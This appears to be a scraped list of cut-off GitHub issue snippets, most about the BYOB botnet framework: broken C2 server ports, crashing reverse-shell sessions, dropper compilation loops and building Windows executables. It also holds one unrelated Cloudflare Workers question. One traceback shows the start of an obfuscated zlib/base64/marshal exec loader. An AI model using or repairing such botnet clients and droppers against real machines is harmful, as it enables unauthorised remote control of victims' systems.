-
root@stevelab:~/Documents/github/byob/byob# python byob_jrB.py
Traceback (most recent call last):
File "byob_jrB.py", line 1, in
import zlib,base64,marshal,urllib;exec(eval(marshal.loads(zli…
-
Raspberry PI 2B - Linux kali 4.1.12-v7 #87 SMP PREEMPT Tue Jan 5 20:59:45 CST 2016 armv7l GNU/Linux
`# python ./client.py --name byob02cl 192.168.1.8 **8186**
[>] Modules
Adding modules…
-
Hi there,
I was wondering if it is possible to run streaming based workers using the cloudworker? (https://developers.cloudflare.com/workers/recipes/streaming-responses/).
When attempting this w…
-
After sending command to the client threw tcp reverse shell, for example: 'help' or any command included in the server parser args, the following error pop up and close all the sessions and the server…
ghost updated
6 years ago
-
When executing client.py from Linux (Debian), I've got an infinite loop at compilation ("Dropper" step).
When I cancel the command, it says `saved to file: /home/jordan/byob/byob/dist/byob_xxx)`.
Bu…
-
[flake8](http://flake8.pycqa.org) testing of https://github.com/colental/byob on Python 3.7.0
$ __flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics__
```
/home/travis/…
-
When creating a pull-request the automated Travis CI test runner is not able to check out foreign repositories.
### Current Result
```
Worker information
hostname: production-2-worker-org-c-2-…
-
Hello Colental,
Please can you assist with the compilation process? I am attempting to create a binary executeable file for windows.
The guide states: "can be compiled with a standalone python …
-
server is started with a port specifier.
```
user@userbox:~/src/byob/byob$ python server.py --host 192.168.1.69 --port 12345
```
c2 server is not listening on the proper port. modules_handler…
-
i run the client.py with the host and port as i want and in the "BYOB" u get a python file i run the file in IDLE and run it and i get this error:
![screenshot 2](https://user-images.githubusercon…